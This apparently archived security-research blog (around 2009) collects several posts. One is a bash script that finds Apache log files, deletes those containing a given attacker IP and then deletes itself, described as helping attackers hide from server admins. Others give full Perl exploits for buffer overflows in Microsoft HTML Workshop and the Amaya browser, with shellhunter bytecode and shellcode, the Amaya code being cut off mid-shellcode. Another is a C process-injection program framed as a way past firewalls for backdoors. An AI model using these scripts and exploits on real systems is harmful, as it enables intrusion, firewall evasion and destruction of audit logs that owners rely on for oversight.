Abysssec Security Researches

Hello

i know , i know i have a big absence about 2 month . but i,m back with a big update for you .

a step by step article about exploiting format string vulnerabilities on windows platform.

here is download link for this article :

http://abysssec.com/blog/wp-content/uploads/2009/02/fstring-exploit.pdf

feel free to send your questions to admin@abysssec.com|NoSpam

Good Luck and Have Fun !

Hey ! I’m back  some exams of university :D and ….

Here is bash script for finding path of log files (Apache first and soon : all Logs) and deleting them for some attackers to be hidden from server admins !.Not bad ? Not good ? Where u use that !?.

At first we find path of directory contain some wanted logs and then searching line by line for log paths,finally founding attacker Ip in log files and removing log file. Be happy !

TEsTed On Debian etch4.0 and FreeBSD 6*

This is Rc 1. [download] : Log_f

and here is source code in bash :

#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
 
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
 
echo "Enter attacker IP"
read -e ip
 
if [ "`find $path -name apache >> $fl`" ];then
	echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
 
	if [ "`find $path -name apache2 >> $fl`" ];then
		echo "Founded Apache2 Config files"
	fi
fi 
 
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
 
#########################################################
if [ -f $1 ];then
let "f=f+1"
	if [ "`ls $1 | grep -F .conf`" ];then
	let "t=t+1"
	cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2  >> $log_path
	nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
	echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
	let "nt=nt+${nom[$t]}"
	let "j=$nt+$t"
	fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files  :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found  :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found  :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total  :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
 
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
	recurse $line
fi
let "l=l+1"
done
}
 
reader
 
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`"	\033[1;30m] $ip in	"
echo -n "Removing $line"
rm $line
 
if [ ! -f $line ];then
echo -e "\033[1;39m	... Done !\033[0;0m"
else
echo -e "\033[1;31m	...Failed!\033[1;0m"
fi
 
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line    "\033[1;39mFile Dose not exist......\033[1;30m]"
fi
 
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m"
 
log_path_reader
 
echo -en "\033[1;30mRemoving 				   $0	"
 
rm $fl $log_path $0
 
 if [ ! -f  $0 ];then
 	echo -e "\033[1;39m	... Done !\033[0;0m"
 else
 	echo -e "\033[1;31m	...Failed!\033[1;0m"
 fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"

—————————————————

daphne  :

Hi readers .

Thanks from mr.Amiri .

when we’re talking about the secret or hidden in server , Log files in unix , linux server , recorded everything . this script is usefull for [white hacker ] and manager to clear major log files .

Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit -

Another step towards perfect exploitation

This is my next article explaining my second public exploit implementing my recent Shellhunting technique.

Why use the technique? Well, believe me I could have made the exploit work on only one Windows version, be it XP or Vista, but to make it universal and work on every Windows NT system, you need to make it advanced.

The vulnerability itself is a normal stack overflow, overflowing all the variables on the stack including, the holy grail, the return address. There is also no character transformation, so why use a shellhunter for the exploit?

Here is why:-

1. To overflow the buffer, 280 bytes and above are needed, this isn’t enough space for a shellcode such as, reverse/bind shell or dl/exec scode, maybe only executing calculator will work.
2. To make it universal there was only one module that had the address, that module is the main applications executable: hhw.exe.
   
3. This address includes a “\x00″ byte (00h), this NULL byte will terminate any more overflow of the buffer so you cannot just simply jump/call the ESP register and execute shellcode after the controllable return address.

Those are the main reasons that need to be worried about. A professional exploit needs to be able to run any shellcode of any capability and size.With the Shellhunter the shellcode may even include NULL bytes!

Lets recap what a shellhunter does:-

1. Searches through memory for a certain “lookout” value that when located will revert program execution flow to the address at the “lookout”. Also the “lookout” values must be a set of friendly instructions that will not cause an unneeded “Access Violation”.
2. In this case there is no need for it to be alphanumerical, also size does not matter.

The new shellhunter in this exploit will be very different from the previous one. It will search through the whole memory of the application looking for the shellcode, it will not be using any register as a base to search from. The technique will also be reminiscent of skape’s egghunter technique (I actually have never read his article, but it is pretty cool that there will be a new/fresh look at this type of exploitation with my method ;) ).

Okay, so what are the new features I am talking about? The shellhunter has indeed increased drastically in size (111 bytes) and the freedom that there are no character restrictions makes it even easier. With that privilege I thought of searching the whole memory with the shellhunter.

Of course there are a few problems that come to mind with that:

• Access Violations will occur when retrieving data from an invalid address.
• We need to store the variable which is address currently searched.
• The applications memory is a huge range from 0×00000000 to just below kernel base which is, 0x7fffffff. The shellhunter must search through the memory in speed, so that the shellcode will be executed fast.
• Also, but I’ll discuss about this later, the stack layout has to be repaired by the shellhunter..

Wow, a load of problems.

Now I will write up how I solved them.

Access Violation problem when reading invalid memory

The first method that came to mind was to use the Structured Exception Handling, and that is the method I am using.

Basically the SEH, will handle exceptions when an exception is thrown out it will change the program flow to the address that is in SEH structure. It is in the basic form a linked list type, this is its layout on the stack:

[ Pointer to the next SEH record]

[Pointer to exception handler code]

Altogether it will occupy 8 bytes on the stack. Using it to our advantage we will need to make the “Pointer to exception handler code” point to our injected code from the overflowed buffer. And in our case, the Pointer to the next SEH record will be set to -1, which in hex form is 0xffffffff.

If you read the shellhunter code correctly you will say its sort of a loop. And you are right. It is a loop that it searches for the “lookout” value, if invalid, exception occurs and then again all over we set up SEH and check for “lookout”.

Save the current address variable somewhere in the heap

In this problem I used the address 0x7ffdfad0. Before setting up SEH, it will retrieve the variable at the address and before checking the value with a CMP, so not to lose the address, it will store it at that address.

Speedy search through memory

At the beginning when the shellhunter was in a premature phase, it searched through 4 bytes at a time. Trust me, It took a lot of time. To solve the problem, I used 32 bytes. But this also needed to increase the amount of “lookout” values that needed to be in the memory so the shellhunter would find it guaranteed (you can see that there are over 64*4 bytes of “lookout” value in the exploit!).

Repairing the Stack layout

This was one of the last problems I encountered when writing the shellhunter. I noticed that when SEH was called and the appropriate modules made their calls and other calculations, the stack would change. It would approximately decrease the ESP register by a couple hundred bytes. We cannot afford to have that because when the ESP register becomes a very low value, a stack overflow exception occurs, and when that is handled there is no space for any SEH to be set up! So to repair the stack I added bytes to the stack at every loop of the shellhunter also using a few pops/pushs instructions to increase the certain measure.

That’s all that you need to know that was added! Certainly, a shellhunter is a must-use in some cases for exploitation and I hope that you can implement the method for your exploits (do remember to credit me ;) )! If you got any problems with writing your certain exploit, and need a shellhunter, don’t hesitate to contact me at skdrat<at>hotmail<.>com (MSN Messenger).

Read the exploit below, and enjoy it!

Milw0rm exploit URL: http://milw0rm.com/exploits/7727

Exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176

 
    #!/usr/bin/perl
    # Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
    # -----------------------------------------------------------------
    # Discovered/Exploit by SkD                    (skdrat@hotmail.com)
    # -----------------------------------------------------------------
    #
    # This is a continuation of my new method, shellhunting.
    # The exploit is far more advanced than the Amaya's as it runs on
    # every system, partly because the shellhunter itself is very much
    # reliable and universal.
    # The shellhunter does the following tasks to find and exec.
    # shellcode:-
    #
    # 1- Searches through the whole memory of the application.
    # 2- Installs a SEH handler so on access violations it won't
    #    stop hunting for the shellcode.
    # 3- Repairs stack so a stack overflow won't occur (that is what
    #    happens when the SEH is called up, many PUSH instructions
    #    are called from the relevant modules (ntdll, etc).
    # 4- Improved speed by searching through 32 bytes at a time.
    # 5- Uses a certain address in memory to store a variable for the
    #    search.
    #
    # It is very stable and will allow any shellcode (bind/reverse shell,
    # dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
    #
    # Yeah, I guess that's about it. Took me a few hours to figure out the
    # whole thing but nothing is impossible ;).
    #
    # Oh, I think some schools use this software :) (it's Microsoft's, right?).
    #
    # You can download the app. from Microsoft's official page:
    # ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
    #
    # If you are interested in my method and want to learn something new or
    # improve your exploitation skills then visit my team's blog at:
    # ->  http://abysssec.com
    #
    # Peace out,
    # SkD.
 
    my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
    "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
    "\x6E\x74\x73\x20\x66\x69\x6C\x65".
    "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
    "\x78\x20\x66\x69\x6C\x65\x3D";
    my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
    "\x0A\x61\x2E\x68\x74\x6D";
    my $crlf      = "\x0d\x0a";
 
    # win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
    my $shellcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
    "\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
    "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
    "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
    "\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
    "\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
    "\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
    "\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
    "\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
    "\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
    "\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
    "\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
    "\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
    "\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
    "\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
    "\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
    "\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
    "\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
    "\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
    "\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
    "\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";
 
    #/----------------Advanced Shellhunter Code----------------\
    #01D717DD   EB 1E            JMP SHORT 01D717FD            |
    #01D717DF   83C4 64          ADD ESP,64                    |
    #01D717E2   83C4 64          ADD ESP,64                    |
    #01D717E5   83C4 64          ADD ESP,64                    |
    #01D717E8   83C4 64          ADD ESP,64                    |
    #01D717EB   83C4 64          ADD ESP,64                    |
    #01D717EE   83C4 64          ADD ESP,64                    |
    #01D717F1   83C4 64          ADD ESP,64                    |
    #01D717F4   83C4 64          ADD ESP,64                    |
    #01D717F7   83C4 64          ADD ESP,64                    |
    #01D717FA   83C4 54          ADD ESP,54                    |
    #01D717FD   33FF             XOR EDI,EDI                   |
    #01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
    #01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
    #01D71806   EB 0E            JMP SHORT 01D71816            |
    #01D71808   58               POP EAX                       |
    #01D71809   83E8 3C          SUB EAX,3C                    |
    #01D7180C   50               PUSH EAX                      |
    #01D7180D   6A FF            PUSH -1                       |
    #01D7180F   33DB             XOR EBX,EBX                   |
    #01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
    #01D71814   EB 05            JMP SHORT 01D7181B            |
    #01D71816   E8 EDFFFFFF      CALL 01D71808                 |
    #01D7181B   B8 12121212      MOV EAX,12121212              |
    #01D71820   6BC0 02          IMUL EAX,EAX,2                |
    #01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
    #01D71828   83C7 20          ADD EDI,20                    |
    #01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
    #01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D7182F  ^75 F7            JNZ SHORT 01D71828            |
    #01D71831   83C7 04          ADD EDI,4                     |
    #01D71834   6BC0 02          IMUL EAX,EAX,2                |
    #01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D71839  ^75 E0            JNZ SHORT 01D7181B            |
    #01D7183B   83C7 04          ADD EDI,4                     |
    #01D7183E   B8 42424242      MOV EAX,42424242              |
    #01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D71845  ^75 D4            JNZ SHORT 01D7181B            |
    #01D71847   83C7 04          ADD EDI,4                     |
    #01D7184A   FFE7             JMP EDI                       |
    #\-----------------------End of Code----------------------/
 
    my $shellhunter = "\xeb\x1e".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x54".
    "\x33\xff".
    "\xba\xd0\xfa\xfd\x7f".
    "\x8b\x3a".
    "\xeb\x0e".
    "\x58".
    "\x83\xe8\x3c".
    "\x50".
    "\x6a\xff".
    "\x33\xdb".
    "\x64\x89\x23".
    "\xeb\x05".
    "\xe8\xed\xff\xff\xff".
    "\xb8\x12\x12\x12\x12".
    "\x6b\xc0\x02".
    "\xba\xd0\xfa\xfd\x7f".
    "\x83\xc7\x20".
    "\x89\x3a".
    "\x39\x07".
    "\x75\xf7".
    "\x83\xc7\x04".
    "\x6b\xc0\x02".
    "\x39\x07".
    "\x75\xe0".
    "\x83\xc7\x04".
    "\xb8\x42\x42\x42\x42".
    "\x39\x07".
    "\x75\xd4".
    "\x83\xc7\x04".
    "\xff\xe7";
    my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
    my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
    my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
    my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
    my $len = 280 - (length($shellhunter) + 55);
    my $overflow1 = "\x41" x $len;
    my $overflow2 = "\x41" x 55;
    my $overflow3 = "\x42" x 256;
    my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]
 
    open(my $hhpprj_file, "> s.hhp");
    print $hhpprj_file $hhp_data1.
    $overflow1.$shellhunter.$overflow2.$ret.
    $crlf.$crlf.
    $hhp_data2.
    $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
    $crlf;
    close $hhpprj_file;

Hello Friends .

First question is why Process  Injection ?

in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or …  .  this Processes can connect to Internet very well [ often  ] .

Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as  : Leak Firewall ] .

in dll injection , we injects dll  into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .

Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory.  as we know Windows is now designed for this, and injection techniques can be used by any application.  Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .

I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want  talk about Process injection [ or hijack] to bypass firewalls .

Attention To modeling :

Principle of application run [default ] :

when inclusion of a dynamic library [dll]   :

inserting malicious code in the process of confidence :

Used internet Explorer [trusted Software ] for injection :

The following illustration shows the general Code injection  with windows API method [virtualAllocEX(),..]

how to Inject Process : [with C cod ]

for firewall bypass we have 4 part :

- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]

Example Of Process Injection In EXPLORER.EXE [code ]:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

 
    #pragma comment(lib,"Shlwapi.lib")
    #pragma comment(lib,"ADVAPI32.LIB")
    #include <stdio.h>
    #include <windows.h>
    #include <Shlwapi.h>
    #include <tlhelp32.h>
    #define INJECT_EXE  "explorer.exe"
 
    typedef struct _RPar
    {
    DWORD dwDeleteFile;
    DWORD dwSleep;
    DWORD dwMessageBox;
    char Filename[1024];
    char string1[1024];
    char string2[1024];
    } RPar;
    DWORD __stdcall ThreadProc(RPar *Para)
    {
    FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
    FARPROC PSleep = (FARPROC)Para->dwSleep;
    FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
 
    PMessageBox(NULL,Para->string1,Para->string2,MB_OK);
 
    while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
    return 0;
    }
    int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
    {
    DWORD dwThreadId,pID=0,dwThreadSize=2048;
    void *pRemoteThread;
    char ExeFile[1024];
    HANDLE hProcess,hSnap;
    HINSTANCE hKernel, hUser;
    RPar my_RPar,*pmy_RPar;
    PROCESSENTRY32 pe32 = {0};
    if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
    return 3;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    Process32First(hSnap, &pe32);
    do {
    if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
    {
    pID=pe32.th32ProcessID;
    break;
    }
    } while (Process32Next(hSnap,&pe32));
 
    if ( hSnap != INVALID_HANDLE_VALUE )
    CloseHandle(hSnap);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
    pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
    WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
    ZeroMemory(&my_RPar,sizeof(RPar));
    hKernel = LoadLibrary( "kernel32.dll");
    my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
    my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
    hUser = LoadLibrary( "user32.dll");
    my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
    GetModuleFileName(NULL,ExeFile,1024);
    printf (ExeFile);
    strcpy(my_RPar.Filename, ExeFile);
    strcpy(my_RPar.string1, "HI Abysssec");
    strcpy(my_RPar.string2, "OK");
    pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
    WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
    CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
    FreeLibrary(hKernel);
    CloseHandle(hProcess);
    system("tasklist");
    return 0;
    }

what Happens When Firewall bypass ?

in servers :

we can call "Internet explorer" or  other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .

with this method , we can telnet to open port of server without any worry  .

In Client :

Backdoor , Trojans , bad software , connect to internet without Access .

Real Word [ Discovered By Abysssec ] test :

Vulnerability Firewall [Outpost 2009 ] :

http://www.agnitum.com/products/outpost/

You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .

[Sorry For more information , This bug is not fixed  , You can test it with Process Injector tools  ].

www.tarasco.org

[pinjector.exe] :

Download Link + source :

http://www.tarasco.org/security/pinjector/index.html

Final deduction:

1- We can Bypass some firewalls : Don't checked  Allocated Memory in Trusted Process .

2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID]  .

In Future :

1- Usage Of these Method In other bypass Protections [hybrid or frees  Protection ]

2 - PE INJECTION , why , what , where !?

More Information :

http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf

http://www.firewallleaktester.com/docs/leaktest.pdf

http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf

--------------------------------------------------------------------------------------

Happy new year  and holy days

god speed you

Daphne

Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit

Vulnerability discovery & Exploit by SkD

We will start with a description of the affected software:

Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. This follows the original vision of the Web as a space for collaboration and not just a one-way publishing medium.

The vulnerability lies in the way Amaya (version 11.0.1 and below) parses HTML tags. Certain tags trigger different vulnerabilites, mostly overflows but each has a different environment for exploitation.

I selected that the “<td nowrap>” and the “<title(overflow)>” tags were the most convenient to use for the exploit.

Here is a picture of the debugger’s state when the buffer overflow occurs with the “<td nowrap>” tag:

As we can see the EIP is fully controllable but to exploit the issue there are quite a few problems:

• The buffer can only have characters from (hex) 0×00 to 0x7f, 0×80 => and above will corrupt the buffer with uneeded characters so the putting the shellcode and finding return addresses will be a problem.
• Registers point at random places except for ESI which can be controlled to point to a specified location with a correct calculation.
• Finding a JMP ESP/CALL ESP in one of the Amaya’s native modules will be hard because none of them include the allowed characters (we want to make it universal).
• Heap layout is randomized.

Please note that I was working on this on Windows Vista SP1 so it may differ with XP, 2003, etc.

Okay, so what can we do? This won’t be exploited the normal way with the classic jmp esp or there isn’t any SEH handlers to exploit so what is there to do? Like I mentioned in the previous list, ESI points to a controllable region in the stack. This region will vary if a calculation for the junk characters is not correct (you will see what I am talking about in the exploit code).  So to combat this problem we must look to the heap for the clean buffer before transformation. Guess what? EDI points close to this but it is random so I cannot just decrease EDI by a static number!  What I did was a similar method to egghunting as in heap overflows but my new method is called, shellhunting. The conclusion is that the shellhunter must be alphanumerical (well, mostly) and it must look for the shellcode in the heap pointed by EDI.

This is a advanced stack overflow exploit which also involves the heap! Please remember that this will only work on Vista SP 1 ( I tested it on XP but different heap layouts again made it a hassle for me to change :) ).

This is the stack and memory when the buffer involves characters over 0×80 (this is the shellcode):

And here is the shellcode so you can compare!

my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";

Very corrupted data, like that we cannot execute anything because of malformed instructions (the decoder for the alphanumerical shellcode will have also no chance to work).  It is clear that the only way will be to look at the heap.

Now I will describe how my shellhunter works!

1. The shellhunter will start as being 98% alphanumerical so it can be successfully executed.
2. The “lookout” values must not cause an exception because we will redirect the execution flow to those values!
3. It will loop and search the heap for the “lookout” values INFRONT of the shellcode.
4. Once the “lookout” values are located, PUSH EDI and then RETN to that address.

This is efficient and it will work one-hundred percent on every try the browser parses the HTML page.

You can also see that I am using an addition with the $additionaddr variable, this is because the variable cannot be on the heap next to the corrupted data! So we basicially add a few bytes to the variable in the register EAX that holds the $additionaddr that will turn into the “lookout” value so the shellhunter can easily compare data in the heap!

I hope you learned something today ladies and gents! The exploit is included below!

#!/usr/bin/perl
#
# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
#                (skd@abysssec.com  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!
 
use strict;
use warnings;
use IO::Socket;
 
my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
